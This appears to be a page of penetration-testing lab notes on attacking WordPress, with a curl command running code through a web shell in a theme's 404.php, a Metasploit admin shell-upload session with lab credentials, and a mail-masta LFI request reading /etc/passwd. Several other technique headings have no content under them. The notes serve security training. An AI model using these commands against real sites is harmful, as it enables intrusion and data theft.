search
LinkedInGithub
githubEdit

2. Attacking Wordpress

hashtag
1. Manual Code Execution via Theme Editor (404.php)

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

hashtag
2. Metasploit wp_admin_shell_upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

hashtag
3. mail-masta LFI Exploit

curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

hashtag
4. wpDiscuz RCE Exploit

hashtag
Python Script Method

hashtag
Curl Method

hashtag
5. WordPress REST API User Enumeration

hashtag
6. XML-RPC Brute Force (system.multicall)

hashtag
7. wp-config.php Exposure Check

hashtag
8. Web Shell Obfuscation Example

Previous1. Wordpress Discovery and EnumerationNext3. Joomla Discovery And Enumeration

Last updated